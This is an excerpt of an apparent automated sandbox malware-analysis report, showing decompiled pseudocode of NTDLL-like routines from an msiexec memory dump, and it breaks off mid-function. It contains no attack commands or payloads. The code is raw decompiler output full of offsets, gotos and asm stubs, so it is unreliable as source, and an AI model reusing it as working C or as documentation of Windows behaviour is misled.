                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                              • API String ID: 0-1911121157
                              • Opcode ID: ad4e8953a9ddf0515da04e304e152e3161058ab6631b7664bd2dc6fb60419e48
                              • Instruction ID: fdb4579dc43eb9f424e3c61363e23319fbd6c3173cd0c50774d6fb489bca8b5e
                              • Opcode Fuzzy Hash: ad4e8953a9ddf0515da04e304e152e3161058ab6631b7664bd2dc6fb60419e48
                              • Instruction Fuzzy Hash: F6118E71610144AFEF22EF50C948F9877F2FB04709F158059E608972A1C739BD44CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 88%
                              			E04DD5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                              				signed int _t296;
                              				signed char _t298;
                              				signed int _t301;
                              				signed int _t306;
                              				signed int _t310;
                              				signed char _t311;
                              				intOrPtr _t312;
                              				signed int _t313;
                              				void* _t327;
                              				signed int _t328;
                              				intOrPtr _t329;
                              				intOrPtr _t333;
                              				signed char _t334;
                              				signed int _t336;
                              				void* _t339;
                              				signed int _t340;
                              				signed int _t356;
                              				signed int _t362;
                              				short _t367;
                              				short _t368;
                              				short _t373;
                              				signed int _t380;
                              				void* _t382;
                              				short _t385;
                              				signed short _t392;
                              				signed char _t393;
                              				signed int _t395;
                              				signed char _t397;
                              				signed int _t398;
                              				signed short _t402;
                              				void* _t406;
                              				signed int _t412;
                              				signed char _t414;
                              				signed short _t416;
                              				signed int _t421;
                              				signed char _t427;
                              				intOrPtr _t434;
                              				signed char _t435;
                              				signed int _t436;
                              				signed int _t442;
                              				signed int _t446;
                              				signed int _t447;
                              				signed int _t451;
                              				signed int _t453;
                              				signed int _t454;
                              				signed int _t455;
                              				intOrPtr _t456;
                              				intOrPtr* _t457;
                              				short _t458;
                              				signed short _t462;
                              				signed int _t469;
                              				intOrPtr* _t474;
                              				signed int _t475;
                              				signed int _t479;
                              				signed int _t480;
                              				signed int _t481;
                              				short _t485;
                              				signed int _t491;
                              				signed int* _t494;
                              				signed int _t498;
                              				signed int _t505;
                              				intOrPtr _t506;
                              				signed short _t508;
                              				signed int _t511;
                              				void* _t517;
                              				signed int _t519;
                              				signed int _t522;
                              				void* _t523;
                              				signed int _t524;
                              				void* _t528;
                              				signed int _t529;
                              
                              				_push(0xd4);
                              				_push(0x4de1178);
                              				E04D5D0E8(__ebx, __edi, __esi);
                              				_t494 = __edx;
                              				 *(_t528 - 0xcc) = __edx;
                              				_t511 = __ecx;
                              				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                              				 *(_t528 - 0xbc) = __ecx;
                              				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                              				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                              				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                              				_t427 = 0;
                              				 *(_t528 - 0x74) = 0;
                              				 *(_t528 - 0x9c) = 0;
                              				 *(_t528 - 0x84) = 0;
                              				 *(_t528 - 0xac) = 0;
                              				 *(_t528 - 0x88) = 0;
                              				 *(_t528 - 0xa8) = 0;
                              				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                              				if( *(_t528 + 0x1c) <= 0x80) {
                              					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                              					if(__eflags != 0) {
                              						_t421 = E04DD4C56(0, __edx, __ecx, __eflags);
                              						__eflags = _t421;
                              						if(_t421 != 0) {
                              							 *((intOrPtr*)(_t528 - 4)) = 0;
                              							E04D4D000(0x410);
                              							 *(_t528 - 0x18) = _t529;
                              							 *(_t528 - 0x9c) = _t529;
                              							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                              							E04DD5542(_t528 - 0x9c, _t528 - 0x84);
                              						}
                              					}
                              					_t435 = _t427;
                              					 *(_t528 - 0xd0) = _t435;
                              					_t474 = _t511 + 0x65;
                              					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                              					_t511 = 0x18;
                              					while(1) {
                              						 *(_t528 - 0xa0) = _t427;
                              						 *(_t528 - 0xbc) = _t427;
                              						 *(_t528 - 0x80) = _t427;
                              						 *(_t528 - 0x78) = 0x50;
                              						 *(_t528 - 0x79) = _t427;
                              						 *(_t528 - 0x7a) = _t427;
                              						 *(_t528 - 0x8c) = _t427;
                              						 *(_t528 - 0x98) = _t427;
                              						 *(_t528 - 0x90) = _t427;
                              						 *(_t528 - 0xb0) = _t427;
                              						 *(_t528 - 0xb8) = _t427;
                              						_t296 = 1 << _t435;
                              						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                              						__eflags = _t436 & _t296;
                              						if((_t436 & _t296) != 0) {
                              							goto L92;
                              						}
                              						__eflags =  *((char*)(_t474 - 1));
                              						if( *((char*)(_t474 - 1)) == 0) {
                              							goto L92;
                              						}
                              						_t301 =  *_t474;
                              						__eflags = _t494[1] - _t301;
                              						if(_t494[1] <= _t301) {
                              							L10:
                              							__eflags =  *(_t474 - 5) & 0x00000040;
                              							if(( *(_t474 - 5) & 0x00000040) == 0) {
                              								L12:
                              								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                              								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                              									goto L92;
                              								}
                              								_t442 =  *(_t474 - 0x11) & _t494[3];
                              								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                              								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                              									goto L92;
                              								}
                              								__eflags = _t442 -  *(_t474 - 0x11);
                              								if(_t442 !=  *(_t474 - 0x11)) {
                              									goto L92;
                              								}
                              								L15:
                              								_t306 =  *(_t474 + 1) & 0x000000ff;
                              								 *(_t528 - 0xc0) = _t306;
                              								 *(_t528 - 0xa4) = _t306;
                              								__eflags =  *0x4df60e8;
                              								if( *0x4df60e8 != 0) {
                              									__eflags = _t306 - 0x40;
                              									if(_t306 < 0x40) {
                              										L20:
                              										asm("lock inc dword [eax]");
                              										_t310 =  *0x4df60e8; // 0x0
                              										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                              										__eflags = _t311 & 0x00000001;
                              										if((_t311 & 0x00000001) == 0) {
                              											 *(_t528 - 0xa0) = _t311;
                              											_t475 = _t427;
                              											 *(_t528 - 0x74) = _t427;
                              											__eflags = _t475;
                              											if(_t475 != 0) {
                              												L91:
                              												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                              												goto L92;
                              											}
                              											asm("sbb edi, edi");
                              											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                              											_t511 = _t498;
                              											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                              											__eflags =  *(_t312 - 5) & 1;
                              											if(( *(_t312 - 5) & 1) != 0) {
                              												_push(_t528 - 0x98);
                              												_push(0x4c);
                              												_push(_t528 - 0x70);
                              												_push(1);
                              												_push(0xfffffffa);
                              												_t412 = E04D49710();
                              												_t475 = _t427;
                              												__eflags = _t412;
                              												if(_t412 >= 0) {
                              													_t414 =  *(_t528 - 0x98) - 8;
                              													 *(_t528 - 0x98) = _t414;
                              													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                              													 *(_t528 - 0x8c) = _t416;
                              													 *(_t528 - 0x79) = 1;
                              													_t511 = (_t416 & 0x0000ffff) + _t498;
                              													__eflags = _t511;
                              												}
                              											}
                              											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                              											__eflags = _t446 & 0x00000004;
                              											if((_t446 & 0x00000004) != 0) {
                              												__eflags =  *(_t528 - 0x9c);
                              												if( *(_t528 - 0x9c) != 0) {
                              													 *(_t528 - 0x7a) = 1;
                              													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                              													__eflags = _t511;
                              												}
                              											}
                              											_t313 = 2;
                              											_t447 = _t446 & _t313;
                              											__eflags = _t447;
                              											 *(_t528 - 0xd4) = _t447;
                              											if(_t447 != 0) {
                              												_t406 = 0x10;
                              												_t511 = _t511 + _t406;
                              												__eflags = _t511;
                              											}
                              											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                              											 *(_t528 - 0x88) = _t427;
                              											__eflags =  *(_t528 + 0x1c);
                              											if( *(_t528 + 0x1c) <= 0) {
                              												L45:
                              												__eflags =  *(_t528 - 0xb0);
                              												if( *(_t528 - 0xb0) != 0) {
                              													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                              													__eflags = _t511;
                              												}
                              												__eflags = _t475;
                              												if(_t475 != 0) {
                              													asm("lock dec dword [ecx+edx*8+0x4]");
                              													goto L100;
                              												} else {
                              													_t494[3] = _t511;
                              													_t451 =  *(_t528 - 0xa0);
                              													_t427 = E04D46DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                              													 *(_t528 - 0x88) = _t427;
                              													__eflags = _t427;
                              													if(_t427 == 0) {
                              														__eflags = _t511 - 0xfff8;
                              														if(_t511 <= 0xfff8) {
                              															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                              															asm("sbb ecx, ecx");
                              															__eflags = (_t451 & 0x000000e2) + 8;
                              														}
                              														asm("lock dec dword [eax+edx*8+0x4]");
                              														L100:
                              														goto L101;
                              													}
                              													_t453 =  *(_t528 - 0xa0);
                              													 *_t494 = _t453;
                              													_t494[1] = _t427;
                              													_t494[2] =  *(_t528 - 0xbc);
                              													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                              													 *_t427 =  *(_t453 + 0x24) | _t511;
                              													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                              													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                              													asm("movsd");
                              													asm("movsd");
                              													asm("movsd");
                              													asm("movsd");
                              													asm("movsd");
                              													asm("movsd");
                              													asm("movsd");
                              													asm("movsd");
                              													__eflags =  *(_t528 + 0x14);
                              													if( *(_t528 + 0x14) == 0) {
                              														__eflags =  *[fs:0x18] + 0xf50;
                              													}
                              													asm("movsd");
                              													asm("movsd");
                              													asm("movsd");
                              													asm("movsd");
                              													__eflags =  *(_t528 + 0x18);
                              													if( *(_t528 + 0x18) == 0) {
                              														_t454 =  *(_t528 - 0x80);
                              														_t479 =  *(_t528 - 0x78);
                              														_t327 = 1;
                              														__eflags = 1;
                              													} else {
                              														_t146 = _t427 + 0x50; // 0x50
                              														_t454 = _t146;
                              														 *(_t528 - 0x80) = _t454;
                              														_t382 = 0x18;
                              														 *_t454 = _t382;
                              														 *((short*)(_t454 + 2)) = 1;
                              														_t385 = 0x10;
                              														 *((short*)(_t454 + 6)) = _t385;
                              														 *(_t454 + 4) = 0;
                              														asm("movsd");
                              														asm("movsd");
                              														asm("movsd");
                              														asm("movsd");
                              														_t327 = 1;
                              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                              														_t479 = 0x68;
                              														 *(_t528 - 0x78) = _t479;
                              													}
                              													__eflags =  *(_t528 - 0x79) - _t327;
                              													if( *(_t528 - 0x79) == _t327) {
                              														_t524 = _t479 + _t427;
                              														_t508 =  *(_t528 - 0x8c);
                              														 *_t524 = _t508;
                              														_t373 = 2;
                              														 *((short*)(_t524 + 2)) = _t373;
                              														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                              														 *((short*)(_t524 + 4)) = 0;
                              														_t167 = _t524 + 8; // 0x8
                              														E04D4F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                              														_t529 = _t529 + 0xc;
                              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                              														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                              														 *(_t528 - 0x78) = _t479;
                              														_t380 =  *(_t528 - 0x80);
                              														__eflags = _t380;
                              														if(_t380 != 0) {
                              															_t173 = _t380 + 4;
                              															 *_t173 =  *(_t380 + 4) | 1;
                              															__eflags =  *_t173;
                              														}
                              														_t454 = _t524;
                              														 *(_t528 - 0x80) = _t454;
                              														_t327 = 1;
                              														__eflags = 1;
                              													}
                              													__eflags =  *(_t528 - 0xd4);
                              													if( *(_t528 - 0xd4) == 0) {
                              														_t505 =  *(_t528 - 0x80);
                              													} else {
                              														_t505 = _t479 + _t427;
                              														_t523 = 0x10;
                              														 *_t505 = _t523;
                              														_t367 = 3;
                              														 *((short*)(_t505 + 2)) = _t367;
                              														_t368 = 4;
                              														 *((short*)(_t505 + 6)) = _t368;
                              														 *(_t505 + 4) = 0;
                              														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                              														_t327 = 1;
                              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                              														_t479 = _t479 + _t523;
                              														 *(_t528 - 0x78) = _t479;
                              														__eflags = _t454;
                              														if(_t454 != 0) {
                              															_t186 = _t454 + 4;
                              															 *_t186 =  *(_t454 + 4) | 1;
                              															__eflags =  *_t186;
                              														}
                              														 *(_t528 - 0x80) = _t505;
                              													}
                              													__eflags =  *(_t528 - 0x7a) - _t327;
                              													if( *(_t528 - 0x7a) == _t327) {
                              														 *(_t528 - 0xd4) = _t479 + _t427;
                              														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                              														E04D4F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                              														_t529 = _t529 + 0xc;
                              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                              														_t479 =  *(_t528 - 0x78) + _t522;
                              														 *(_t528 - 0x78) = _t479;
                              														__eflags = _t505;
                              														if(_t505 != 0) {
                              															_t199 = _t505 + 4;
                              															 *_t199 =  *(_t505 + 4) | 1;
                              															__eflags =  *_t199;
                              														}
                              														_t505 =  *(_t528 - 0xd4);
                              														 *(_t528 - 0x80) = _t505;
                              													}
                              													__eflags =  *(_t528 - 0xa8);
                              													if( *(_t528 - 0xa8) != 0) {
                              														_t356 = _t479 + _t427;
                              														 *(_t528 - 0xd4) = _t356;
                              														_t462 =  *(_t528 - 0xac);
                              														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                              														_t485 = 0xc;
                              														 *((short*)(_t356 + 2)) = _t485;
                              														 *(_t356 + 6) = _t462;
                              														 *((short*)(_t356 + 4)) = 0;
                              														_t211 = _t356 + 8; // 0x9
                              														E04D4F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                              														E04D4FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                              														_t529 = _t529 + 0x18;
                              														_t427 =  *(_t528 - 0x88);
                              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                              														_t505 =  *(_t528 - 0xd4);
                              														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                              														 *(_t528 - 0x78) = _t479;
                              														_t362 =  *(_t528 - 0x80);
                              														__eflags = _t362;
                              														if(_t362 != 0) {
                              															_t222 = _t362 + 4;
                              															 *_t222 =  *(_t362 + 4) | 1;
                              															__eflags =  *_t222;
                              														}
                              													}
                              													__eflags =  *(_t528 - 0xb0);
                              													if( *(_t528 - 0xb0) != 0) {
                              														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                              														_t458 = 0xb;
                              														 *((short*)(_t479 + _t427 + 2)) = _t458;
                              														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                              														 *((short*)(_t427 + 4 + _t479)) = 0;
                              														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                              														E04D4FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                              														_t529 = _t529 + 0xc;
                              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                              														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                              														 *(_t528 - 0x78) = _t479;
                              														__eflags = _t505;
                              														if(_t505 != 0) {
                              															_t241 = _t505 + 4;
                              															 *_t241 =  *(_t505 + 4) | 1;
                              															__eflags =  *_t241;
                              														}
                              													}
                              													_t328 =  *(_t528 + 0x1c);
                              													__eflags = _t328;
                              													if(_t328 == 0) {
                              														L87:
                              														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                              														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                              														_t455 =  *(_t528 - 0xdc);
                              														 *(_t427 + 0x14) = _t455;
                              														_t480 =  *(_t528 - 0xa0);
                              														_t517 = 3;
                              														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                              														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                              															asm("rdtsc");
                              															 *(_t427 + 0x3c) = _t480;
                              														} else {
                              															 *(_t427 + 0x3c) = _t455;
                              														}
                              														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                              														_t456 =  *[fs:0x18];
                              														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                              														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                              														_t427 = 0;
                              														__eflags = 0;
                              														_t511 = 0x18;
                              														goto L91;
                              													} else {
                              														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                              														__eflags = _t519;
                              														 *(_t528 - 0x8c) = _t328;
                              														do {
                              															_t506 =  *((intOrPtr*)(_t519 - 4));
                              															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                              															 *(_t528 - 0xd4) =  *(_t519 - 8);
                              															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                              															__eflags =  *(_t333 + 0x36) & 0x00004000;
                              															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                              																_t334 =  *_t519;
                              															} else {
                              																_t334 = 0;
                              															}
                              															_t336 = _t334 & 0x000000ff;
                              															__eflags = _t336;
                              															_t427 =  *(_t528 - 0x88);
                              															if(_t336 == 0) {
                              																_t481 = _t479 + _t506;
                              																__eflags = _t481;
                              																 *(_t528 - 0x78) = _t481;
                              																E04D4F3E0(_t479 + _t427, _t457, _t506);
                              																_t529 = _t529 + 0xc;
                              															} else {
                              																_t340 = _t336 - 1;
                              																__eflags = _t340;
                              																if(_t340 == 0) {
                              																	E04D4F3E0( *(_t528 - 0xb8), _t457, _t506);
                              																	_t529 = _t529 + 0xc;
                              																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                              																} else {
                              																	__eflags = _t340 == 0;
                              																	if(_t340 == 0) {
                              																		__eflags = _t506 - 8;
                              																		if(_t506 == 8) {
                              																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                              																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                              																		}
                              																	}
                              																}
                              															}
                              															_t339 = 0x10;
                              															_t519 = _t519 + _t339;
                              															_t263 = _t528 - 0x8c;
                              															 *_t263 =  *(_t528 - 0x8c) - 1;
                              															__eflags =  *_t263;
                              															_t479 =  *(_t528 - 0x78);
                              														} while ( *_t263 != 0);
                              														goto L87;
                              													}
                              												}
                              											} else {
                              												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                              												 *(_t528 - 0xa2) = _t392;
                              												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                              												__eflags = _t469;
                              												while(1) {
                              													 *(_t528 - 0xe4) = _t511;
                              													__eflags = _t392;
                              													_t393 = _t427;
                              													if(_t392 != 0) {
                              														_t393 =  *((intOrPtr*)(_t469 + 4));
                              													}
                              													_t395 = (_t393 & 0x000000ff) - _t427;
                              													__eflags = _t395;
                              													if(_t395 == 0) {
                              														_t511 = _t511 +  *_t469;
                              														__eflags = _t511;
                              													} else {
                              														_t398 = _t395 - 1;
                              														__eflags = _t398;
                              														if(_t398 == 0) {
                              															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                              															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                              														} else {
                              															__eflags = _t398 == 1;
                              															if(_t398 == 1) {
                              																 *(_t528 - 0xa8) =  *(_t469 - 8);
                              																_t402 =  *_t469 & 0x0000ffff;
                              																 *(_t528 - 0xac) = _t402;
                              																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                              															}
                              														}
                              													}
                              													__eflags = _t511 -  *(_t528 - 0xe4);
                              													if(_t511 <  *(_t528 - 0xe4)) {
                              														break;
                              													}
                              													_t397 =  *(_t528 - 0x88) + 1;
                              													 *(_t528 - 0x88) = _t397;
                              													_t469 = _t469 + 0x10;
                              													__eflags = _t397 -  *(_t528 + 0x1c);
                              													_t392 =  *(_t528 - 0xa2);
                              													if(_t397 <  *(_t528 + 0x1c)) {
                              														continue;
                              													}
                              													goto L45;
                              												}
                              												_t475 = 0x216;
                              												 *(_t528 - 0x74) = 0x216;
                              												goto L45;
                              											}
                              										} else {
                              											asm("lock dec dword [eax+ecx*8+0x4]");
                              											goto L16;
                              										}
                              									}
                              									_t491 = E04DD4CAB(_t306, _t528 - 0xa4);
                              									 *(_t528 - 0x74) = _t491;
                              									__eflags = _t491;
                              									if(_t491 != 0) {
                              										goto L91;
                              									} else {
                              										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                              										goto L20;
                              									}
                              								}
                              								L16:
                              								 *(_t528 - 0x74) = 0x1069;
                              								L93:
                              								_t298 =  *(_t528 - 0xd0) + 1;
                              								 *(_t528 - 0xd0) = _t298;
                              								_t474 = _t474 + _t511;
                              								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                              								_t494 = 4;
                              								__eflags = _t298 - _t494;
                              								if(_t298 >= _t494) {
                              									goto L100;
                              								}
                              								_t494 =  *(_t528 - 0xcc);
                              								_t435 = _t298;
                              								continue;
                              							}
                              							__eflags = _t494[2] | _t494[3];
                              							if((_t494[2] | _t494[3]) == 0) {
                              								goto L15;
                              							}
                              							goto L12;
                              						}
                              						__eflags = _t301;
                              						if(_t301 != 0) {
                              							goto L92;
                              						}
                              						goto L10;
                              						L92:
                              						goto L93;
                              					}
                              				} else {
                              					_push(0x57);
                              					L101:
                              					return E04D5D130(_t427, _t494, _t511);
                              				}
                              			}


                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 92071b0b8688cab0de1eadac7180a5bdb1dedd666e2ee853e696f4d08e3020db
                              • Instruction ID: 2b1f5155066a671b31a99cdd3bc1eb16e4b53d205793864ed2a486277f1e8122
                              • Opcode Fuzzy Hash: 92071b0b8688cab0de1eadac7180a5bdb1dedd666e2ee853e696f4d08e3020db
                              • Instruction Fuzzy Hash: 8F424D75A00229DFDB24CF68C890BA9B7B1FF45304F1481AAD94DEB241E775E985CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 92%
                              			E04D24120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                              				signed int _v8;
                              				void* _v20;
                              				signed int _v24;
                              				char _v532;
                              				char _v540;
                              				signed short _v544;
                              				signed int _v548;
                              				signed short* _v552;
                              				signed short _v556;
                              				signed short* _v560;
                              				signed short* _v564;
                              				signed short* _v568;
                              				void* _v570;
                              				signed short* _v572;
                              				signed short _v576;
                              				signed int _v580;
                              				char _v581;
                              				void* _v584;
                              				unsigned int _v588;
                              				signed short* _v592;
                              				void* _v597;
                              				void* _v600;
                              				void* _v604;
                              				void* _v609;
                              				void* _v616;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				unsigned int _t161;
                              				signed int _t162;
                              				unsigned int _t163;
                              				void* _t169;
                              				signed short _t173;
                              				signed short _t177;
                              				signed short _t181;
                              				unsigned int _t182;
                              				signed int _t185;
                              				signed int _t213;
                              				signed int _t225;
                              				short _t233;
                              				signed char _t234;
                              				signed int _t242;
                              				signed int _t243;
                              				signed int _t244;
                              				signed int _t245;
                              				signed int _t250;
                              				void* _t251;
                              				signed short* _t254;
                              				void* _t255;
                              				signed int _t256;
                              				void* _t257;
                              				signed short* _t260;
                              				signed short _t265;
                              				signed short* _t269;
                              				signed short _t271;
                              				signed short** _t272;
                              				signed short* _t275;
                              				signed short _t282;
                              				signed short _t283;
                              				signed short _t290;
                              				signed short _t299;
                              				signed short _t307;
                              				signed int _t308;
                              				signed short _t311;
                              				signed short* _t315;
                              				signed short _t316;
                              				void* _t317;
                              				void* _t319;
                              				signed short* _t321;
                              				void* _t322;
                              				void* _t323;
                              				unsigned int _t324;
                              				signed int _t325;
                              				void* _t326;
                              				signed int _t327;
                              				signed int _t329;
                              
                              				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                              				_v8 =  *0x4dfd360 ^ _t329;
                              				_t157 = _a8;
                              				_t321 = _a4;
                              				_t315 = __edx;
                              				_v548 = __ecx;
                              				_t305 = _a20;
                              				_v560 = _a12;
                              				_t260 = _a16;
                              				_v564 = __edx;
                              				_v580 = _a8;
                              				_v572 = _t260;
                              				_v544 = _a20;
                              				if( *__edx <= 8) {
                              					L3:
                              					if(_t260 != 0) {
                              						 *_t260 = 0;
                              					}
                              					_t254 =  &_v532;
                              					_v588 = 0x208;
                              					if((_v548 & 0x00000001) != 0) {
                              						_v556 =  *_t315;
                              						_v552 = _t315[2];
                              						_t161 = E04D3F232( &_v556);
                              						_t316 = _v556;
                              						_v540 = _t161;
                              						goto L17;
                              					} else {
                              						_t306 = 0x208;
                              						_t298 = _t315;
                              						_t316 = E04D26E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                              						if(_t316 == 0) {
                              							L68:
                              							_t322 = 0xc0000033;
                              							goto L39;
                              						} else {
                              							while(_v581 == 0) {
                              								_t233 = _v588;
                              								if(_t316 > _t233) {
                              									_t234 = _v548;
                              									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                              										_t254 = L04D24620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                              										if(_t254 == 0) {
                              											_t169 = 0xc0000017;
                              										} else {
                              											_t298 = _v564;
                              											_v588 = _t316;
                              											_t306 = _t316;
                              											_t316 = E04D26E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                              											if(_t316 != 0) {
                              												continue;
                              											} else {
                              												goto L68;
                              											}
                              										}
                              									} else {
                              										goto L90;
                              									}
                              								} else {
                              									_v556 = _t316;
                              									 *((short*)(_t329 + 0x32)) = _t233;
                              									_v552 = _t254;
                              									if(_t316 < 2) {
                              										L11:
                              										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                              											_t161 = 5;
                              										} else {
                              											if(_t316 < 6) {
                              												L87:
                              												_t161 = 3;
                              											} else {
                              												_t242 = _t254[2] & 0x0000ffff;
                              												if(_t242 != 0x5c) {
                              													if(_t242 == 0x2f) {
                              														goto L16;
                              													} else {
                              														goto L87;
                              													}
                              													goto L101;
                              												} else {
                              													L16:
                              													_t161 = 2;
                              												}
                              											}
                              										}
                              									} else {
                              										_t243 =  *_t254 & 0x0000ffff;
                              										if(_t243 == 0x5c || _t243 == 0x2f) {
                              											if(_t316 < 4) {
                              												L81:
                              												_t161 = 4;
                              												goto L17;
                              											} else {
                              												_t244 = _t254[1] & 0x0000ffff;
                              												if(_t244 != 0x5c) {
                              													if(_t244 == 0x2f) {
                              														goto L60;
                              													} else {
                              														goto L81;
                              													}
                              												} else {
                              													L60:
                              													if(_t316 < 6) {
                              														L83:
                              														_t161 = 1;
                              														goto L17;
                              													} else {
                              														_t245 = _t254[2] & 0x0000ffff;
                              														if(_t245 != 0x2e) {
                              															if(_t245 == 0x3f) {
                              																goto L62;
                              															} else {
                              																goto L83;
                              															}
                              														} else {
                              															L62:
                              															if(_t316 < 8) {
                              																L85:
                              																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                              																goto L17;
                              															} else {
                              																_t250 = _t254[3] & 0x0000ffff;
                              																if(_t250 != 0x5c) {
                              																	if(_t250 == 0x2f) {
                              																		goto L64;
                              																	} else {
                              																		goto L85;
                              																	}
                              																} else {
                              																	L64:
                              																	_t161 = 6;
                              																	goto L17;
                              																}
                              															}
                              														}
                              													}
                              												}
                              											}
                              											goto L101;
                              										} else {
                              											goto L11;
                              										}
                              									}
                              									L17:
                              									if(_t161 != 2) {
                              										_t162 = _t161 - 1;
                              										if(_t162 > 5) {
                              											goto L18;
                              										} else {
                              											switch( *((intOrPtr*)(_t162 * 4 +  &M04D245F8))) {
                              												case 0:
                              													_v568 = 0x4ce1078;
                              													__eax = 2;
                              													goto L20;
                              												case 1:
                              													goto L18;
                              												case 2:
                              													_t163 = 4;
                              													goto L19;
                              											}
                              										}
                              										goto L41;
                              									} else {
                              										L18:
